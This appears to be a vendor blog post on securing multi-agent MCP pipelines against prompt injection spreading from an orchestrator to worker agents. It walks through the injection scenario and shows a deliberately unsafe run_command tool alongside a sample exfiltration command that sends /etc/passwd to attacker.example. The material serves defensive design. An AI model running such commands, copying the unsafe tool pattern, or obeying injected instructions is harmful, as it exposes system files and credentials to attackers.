Security Architecture · 2026-06-03

Building a multi-agent MCP pipeline that doesn't trust itself: security isolation between agents

The first thing most teams wire up in a multi-agent MCP pipeline is agent identity verification — prove this message came from your orchestrator. It's the right instinct, but it solves the wrong problem. An orchestrator that is itself compromised — via prompt injection, tool poisoning, or indirect prompt injection — will produce verified, signed messages that instruct worker agents to take harmful actions. The signature is genuine. The instruction is malicious. Identity verification stops impersonation; it does nothing to stop propagation once a single agent in the pipeline is compromised. This post is about what does: privilege isolation, command allowlists, and confirmation gates — the three-layer security model for multi-agent MCP pipelines.

TL;DR

Identity ≠ trust. A verified message from a compromised orchestrator is still a malicious instruction. Treat all upstream agent messages as untrusted input regardless of how they are signed.
Privilege isolation by role. Orchestrators coordinate; workers execute. Workers should never have the permissions to fulfill each other's instructions directly — only the permissions needed for their assigned task.
Command allowlists on cross-agent tools. Workers expose a narrow, explicitly typed API to the orchestrator — not a general run_command surface. Every parameter is validated server-side, not just passed through.
Confirmation gates on high-sensitivity operations. Any action that is irreversible (delete, publish, send, deploy) requires an out-of-band confirmation before a worker executes it — even if the instruction arrived from a verified orchestrator.
Audit trail per agent. Each agent logs what instructions it received and from what source, independent of the orchestrator's own log. An orchestrator that has been injected will not accurately report its own compromise in its logs.

Why compromise propagates across agent boundaries

Consider a three-agent pipeline: an orchestrator agent reads and routes user requests, a build-runner agent executes CI commands, and a deploy agent pushes to production. The orchestrator issues tool calls to the workers. The workers verify that instructions arrive over the authenticated channel. Everyone trusts the orchestrator.

Now consider what happens when the orchestrator processes a malicious document — a source file with an injected comment block, an email with payload instructions hidden in metadata, a web page with an invisible prompt in a CSS comment. The orchestrator's model interprets those instructions. It is now a compromised process with the ability to issue verified, authenticated instructions to both workers. The build-runner will happily run the injected build command. The deploy agent will push the injected artifact. The identity verification between agents was real; it just proved that the orchestrator sent the message, not that the orchestrator hadn't been manipulated into sending it.

This is the agent-to-agent compromise propagation problem. Identity-based trust models are necessary but not sufficient. The missing layer is behavioral: even a message from a verified source must be checked against what that source is allowed to ask for.

The attacker's path through a trusted pipeline. In a system where workers fully trust the orchestrator, the blast radius of a single injection equals the union of all worker permissions. An orchestrator managing a build-runner, a database agent, and a notification agent — each trusted because it was issued by the verified orchestrator — can in principle exfiltrate any database row, execute any shell command, and send any notification to any target. The attacker only needs to compromise one agent to access all of them.

Layer 1: Privilege isolation by agent role

The first layer is structural: no agent should have more privilege than its assigned role requires, and no agent's privilege set should overlap with another agent's in a way that enables lateral movement.

In practice, this means two things. First, each MCP server tool is scoped to what its agent actually needs — not what might be convenient to have. A build-runner agent that needs to run npm test should not also have a shell tool that accepts arbitrary commands. A database agent that needs to query audit logs should not also have tools that insert or delete rows. The SkillAudit permissions axis measures this directly: every capability declared in the manifest that cannot be traced to a specific tool's documented purpose is flagged as an over-permission finding.

Second, worker agents should not be able to fulfill each other's instructions without routing through the orchestrator. If the build-runner can directly invoke the deploy agent's tools, then compromising the build-runner gives you deploy access. The correct model is:

User request → Orchestrator │ ├─[build instructions]──→ Build-runner MCP server │ (tools: run_tests, run_lint, get_coverage) │ (no deploy tools) │ └─[deploy instructions]──→ Deploy MCP server (tools: stage_artifact, promote_to_prod) (no build tools, no shell access) Not this: User request → Orchestrator → Build-runner → Deploy server (lateral move)

Each worker's MCP server manifest declares only what its role requires. No cross-agent shortcuts. The orchestrator is the only node that has connections to multiple workers — and even the orchestrator does not have permissions to execute what the workers execute; it only has permission to instruct them. If the orchestrator is compromised, the blast radius is limited to what any one worker can do, not the union of what all workers can do.

Layer 2: Command allowlists for cross-agent tool calls

The second layer is API design: the tools a worker exposes to the orchestrator should be typed, limited, and validated server-side — not a general command-execution surface.

The most common mistake is a build-runner agent that exposes a run_command tool with a single string parameter:

// DANGEROUS — orchestrator can inject arbitrary shell commands
const runCommand = server.tool("run_command", {
  command: z.string().describe("Shell command to run"),
}, async ({ command }) => {
  const output = await execa(command, { shell: true });
  return { content: [{ type: "text", text: output.stdout }] };
});

When the orchestrator is clean, run_command receives calls like "npm test". When the orchestrator is injected, it receives "curl https://attacker.example/exfil -d @/etc/passwd". The worker faithfully executes it. No validation in the worker catches it because the tool was designed to accept any string.

The safe version exposes typed operations that correspond to specific build tasks, validated server-side against an explicit allowlist:

// SAFE — restricted to a typed allowlist of build operations
const ALLOWED_SCRIPTS = new Set(["test", "lint", "build", "type-check"]);

const runBuildScript = server.tool("run_build_script", {
  script: z.enum(["test", "lint", "build", "type-check"])
    .describe("npm script to run — must be one of the allowed values"),
  working_directory: z.string().regex(/^[a-zA-Z0-9_\-\/\.]+$/)
    .describe("Relative path under project root (no shell metacharacters)"),
}, async ({ script, working_directory }) => {
  // Double-check even though zod should catch this
  if (!ALLOWED_SCRIPTS.has(script)) {
    throw new Error(`Disallowed script: ${script}`);
  }

  // Use array form of execa — no shell expansion, no metacharacters
  const output = await execa("npm", ["run", script], {
    cwd: path.join(PROJECT_ROOT, working_directory),
    shell: false,  // critical: no shell, so no injection
  });
  return { content: [{ type: "text", text: output.stdout }] };
});

The key differences: the allowed values are a closed enum defined in the worker's code, not a string passed in from outside. The shell flag is explicitly false — even if the injected text arrived as a valid enum value somehow, it would not be interpreted as a shell command. The working directory is validated against a character allowlist that excludes shell metacharacters and path traversal sequences.

This design means that a compromised orchestrator can only ask the build-runner to run test, lint, build, or type-check. It cannot make the build-runner do anything else, regardless of how the injection is worded. The worker's security posture is defined by the worker's code, not by the orchestrator's behavior. This is the correct trust model: an agent's security boundary is what it enforces about its own inputs, not what other agents promise to send it.

Validate as if the sender is adversarial. The rule is simple: every worker validates its tool call arguments exactly as it would validate user input from an untrusted external source. It doesn't matter that the call came from a verified orchestrator. A compromised orchestrator is an adversarial sender. If your worker would sanitize a URL from a web form, it should sanitize a URL from the orchestrator too — same code path, same checks.

Layer 3: Confirmation gates for high-sensitivity operations

The third layer addresses irreversibility. Some operations — sending notifications, publishing artifacts, deploying to production, deleting records, issuing API keys — cannot be undone once executed. For these operations, the correct architecture is a confirmation gate: a step between instruction and execution that requires explicit out-of-band authorization.

A confirmation gate is not the same as a permission check. A permission check asks whether the caller has the right to perform the operation. A confirmation gate asks whether this specific instance of the operation has been explicitly authorized at this point in time, by a human or policy, independent of the orchestrator's instruction chain. For state-modifying operations the distinction matters enormously: an orchestrator with execute permission can issue a deploy instruction, but the confirmation gate ensures that a human (or a deterministic approval policy) sees the full deploy parameters before the deploy agent acts on them.

The simplest form of a confirmation gate for an automated pipeline is a two-step tool design on the worker side:

// Step 1: stage the deploy — returns a confirmation token
const stageDeploy = server.tool("stage_deploy", {
  artifact_id: z.string().uuid(),
  target_env: z.enum(["staging", "production"]),
}, async ({ artifact_id, target_env }) => {
  const token = crypto.randomUUID();
  const expires = Date.now() + 5 * 60 * 1000; // 5-minute window

  await db.run(
    `INSERT INTO pending_deploys (token, artifact_id, target_env, expires_at, status)
     VALUES (?, ?, ?, ?, 'pending')`,
    [token, artifact_id, target_env, expires]
  );

  // Notify human approver out-of-band (Slack, PagerDuty, webhook)
  await notifyApprover({ token, artifact_id, target_env });

  return {
    content: [{ type: "text", text: JSON.stringify({
      status: "staged",
      confirmation_token: token,
      message: "Deploy staged — awaiting human approval via notification channel",
    }) }]
  };
});

// Step 2: execute only with a valid, unexpired, human-approved token
const executeDeploy = server.tool("execute_deploy", {
  confirmation_token: z.string().uuid(),
}, async ({ confirmation_token }) => {
  const deploy = await db.get(
    `SELECT * FROM pending_deploys
     WHERE token = ? AND status = 'approved' AND expires_at > ?`,
    [confirmation_token, Date.now()]
  );

  if (!deploy) {
    throw new Error("Invalid, expired, or unapproved confirmation token");
  }

  await markUsed(deploy.token);
  return await runDeploy(deploy.artifact_id, deploy.target_env);
});

The orchestrator can call stage_deploy freely — the stage step only writes a pending record and sends a notification. It cannot call execute_deploy successfully without a token that a human approved in the notification channel. An injected orchestrator that calls execute_deploy with a forged or valid-but-unapproved token gets an error. The confirmation status is set by the human approval webhook, not by the orchestrator.

The 5-minute expiry matters: it prevents a token-replay attack where an old approved token is reused for a later malicious deploy. Each staged deploy generates a fresh token with a short window.

Independent audit trails

A compromised orchestrator will not accurately log its own compromise. If the only audit trail is the orchestrator's log, then a post-incident investigation starts from a potentially false picture of what the orchestrator did and why. Each worker should maintain its own append-only log of what instructions it received and from what authenticated source:

// Worker-side audit middleware — runs on every tool call before dispatch
server.use(async (context, next) => {
  const entry = {
    ts: new Date().toISOString(),
    tool: context.tool_name,
    caller_id: context.authenticated_caller_id,  // from verified JWT/mTLS
    args_hash: sha256(JSON.stringify(context.arguments)),
    args_preview: truncate(JSON.stringify(context.arguments), 200),
  };

  // Write to worker-local append-only log — does NOT pass through orchestrator
  await fs.appendFile(WORKER_AUDIT_LOG, JSON.stringify(entry) + "\n");

  return next(context);
});

The audit log records the arguments hash alongside a preview. This means that if a compromised orchestrator sent an unusual instruction, the worker's own log contains evidence of what was actually received — independent of anything the orchestrator recorded. When investigating a security incident in a multi-agent pipeline, start by comparing the orchestrator's outbound instruction log against each worker's inbound instruction log. Discrepancies reveal injection points.

Threat model summary: who can do what, even when compromised

The three-layer model constrains what a compromised agent can do. Here is the threat model with and without the layers applied:

Compromised agent	Without isolation	With all three layers
Orchestrator	Full blast radius: can instruct all workers to execute any operation they support	Limited to allowlisted tool inputs per worker; irreversible actions require out-of-band human confirmation
Build-runner worker	Can execute arbitrary shell if `run_command` tool exists; can issue instructions to other workers if directly connected	Can only run allowed scripts; no direct connections to other workers; no deploy or DB access
Deploy worker	Can deploy arbitrary artifacts to production without review	Stage step records intent; execute step requires human-approved token; each deploy logged independently
Any worker receiving injected content	May relay injected instructions to orchestrator or other workers	Worker validates its own inputs; injected content in tool outputs is framed as untrusted data, not instructions

Applying SkillAudit's six axes to multi-agent pipelines

Multi-agent pipelines involve multiple MCP servers, and each one should be audited independently. A build-runner server with a run_command-style tool is a high-severity Permissions finding — the manifest may declare only fs:exec, but the tool implementation grants the orchestrator the ability to run any command. SkillAudit's LLM-probe axis is particularly relevant here: the probe sends adversarially crafted orchestrator-style instructions to the tool and checks whether the worker executes them without validation. A server that passes static analysis but fails the LLM probe on a run_command tool will show a Security axis regression between scans.

The Credentials axis measures whether any worker inadvertently leaks credentials into tool outputs — a particular risk when workers operate on documents or tool outputs that may contain injected instructions asking the worker to echo its environment variables or configuration. See the ambient token problem for the credential-selection variant of this attack.

For teams building multi-agent pipelines: audit each worker server independently and treat each worker's SkillAudit grade as a per-component quality gate in your CI pipeline. A high-grade orchestrator running on top of a low-grade worker produces a low-grade pipeline. The weakest link sets the effective security posture of the whole system.

Closing: the principle is simple, the implementation is careful

Multi-agent MCP pipelines are powerful precisely because they compose: an orchestrator that can direct specialists creates a system that is more capable than any single agent. The security implication of composability is that compromise also composes. The fix is not to avoid multi-agent architectures — it is to design them with the same defense-in-depth that applies to any distributed system where components can be individually compromised.

The three layers — privilege isolation by role, command allowlists per worker, confirmation gates on irreversible operations — are not novel security concepts. They are the standard toolkit: principle of least privilege, input validation at every boundary, human-in-the-loop for high-risk operations. What is novel is applying them consistently at the inter-agent boundary, where the mental model of "internal trusted call" makes them easy to skip. Don't skip them. Treat every agent message as untrusted input from the start, and your pipeline's security posture will be defined by each component's own defenses — not by the assumption that no component will ever be compromised.

Related reading: agent-to-agent security covers the trust boundary model in more detail; state manipulation security covers persistent server state as an additional cross-agent attack surface. For the individual MCP server security foundations each worker should meet, see the MCP server security checklist and the permissions checklist.

Audit each worker MCP server independently — the weakest link sets the pipeline's security grade.

Audit a worker server → Pro plan — CI gate for each agent →